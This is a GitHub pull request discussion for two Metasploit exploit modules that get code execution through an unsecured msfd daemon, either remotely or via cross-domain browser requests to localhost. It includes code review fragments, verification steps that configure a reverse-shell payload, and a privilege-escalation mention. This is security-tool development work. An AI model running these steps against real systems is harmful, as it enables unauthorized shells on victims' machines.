New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Module msfd rce (remote and through browser) #9908
Conversation
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for writing this! When changing this stuff, keep in mind that changes to documentation will generally apply to both documents.
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Metasploit msfd Remote Code Execution', |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
You may want to change this so it doesn't get confused with your other module (which has the same name).
Something like Metasploit msfd Remote Code Execution Via Browser
would probably be fine
this module places the payload in the POST-data. These POST-requests | ||
can be sent cross-domain and can therefore be sent to localhost on the | ||
victim's machine. The msfconsole-command to execute code is 'rbi -e | ||
"CODE"'. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
A note that only IE works for exploitation on Windows would be good somewhere here.
|
||
def exploit | ||
connect | ||
data = sock.get_once |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Why do you need this variable? You're not using it anywhere in the method.
This module has been tested on the following targets: | ||
|
||
* Metasploit 5.0.0 on Ubuntu 16.04 (using Firefox and Chrome) | ||
* Metasploit 4.16.51 on Windows 7 (using IE, exploitation failed in Firefox and |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
If it affects older versions of metasploit, write < 4.16.51
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I've tried to clarify on this point. Pretty much all versions are vulnerable, but I have only tested the targets listed.
To start the vulnerable service, run: | ||
|
||
``` | ||
$ msfd -f -q |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This should probably be moved down to the Verification Steps
section
|
||
**REMOTE_PORT** | ||
|
||
Remote port |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This should probably be more specific
Thanks for the review, I've updated according to your comments. |
Hey @rstenvi, thanks for the modules! I'm testing them out locally, and running into an issue with payload encoding. You've defined But it seems that this prevents the verification steps from succeeding. In my testing, the
Why are we failing to encode the payload? Attempting to generate the payload separately using
Note the second-to-last line, which reports that the payload generation failed because of the inability to avoid the While I think we could stand to improve Could you confirm if the verification steps work for you? |
#6714 may be relevant for context. |
@rstenvi : Outstanding! Two contributions for the price of one. 😄 Just a note here that #9900 has been landed separately:
With the new payload modification, this exploit module worked perfectly for me, so I've merged it into |
Release NotesThe exploits/multi/misc/msfd_rce_remote and exploits/multi/browser/msfd_rce_browser modules have been added to the framework. Both modules use an unsecured msfd daemon to get a shell on your target. Use the exploits/multi/misc/msfd_rce_remote module if the msfd-program is exposed on an external interface. Use the exploits/multi/browser/msfd_rce_browser module to send network requests to localhost via the target's browser. |
This PR adds two modules for exploiting Metasploit's msf daemon. The Metasploit team was contacted privately first and they confirmed that this is not a vulnerability, but intended behavior. These two modules are dependent on PR 9900 and will not work without it.
This PR adds two modules because they target the same functionality, but through different methods. The first method can be used if the msfd-program is exposed on an external interface and the second method uses the victim's browser to send network requests to localhost.
Verification
Verification step for module
msfd_rce_remote
msfd -q -f -a 0.0.0.0
msfconsole
use exploit/multi/misc/msfd_rce_remote
set rhost IP
set rport PORT
set payload ruby/shell_reverse_tcp
set lhost IP
set lport PORT
exploit
The above module could also be used for privilege escalation, see steps in the documentation for how this can be done.
Verification step for module
msfd_rce_browser
msfd -q -f
msfconsole
use exploit/multi/browser/msfd_rce_browser
set remote_ip IP
set remote_port PORT
set payload ruby/shell_reverse_tcp
set lhost IP
set lport PORT
exploit
Both exploits have been tested and verified to work on Linux and Windows, but
msfd_rce_browser
is unreliable on Windows. The exploit rarely worked when Firefox or Chrome was used and only worked in IE when the-q
flag was sent to msfd. On Linux I had no issues.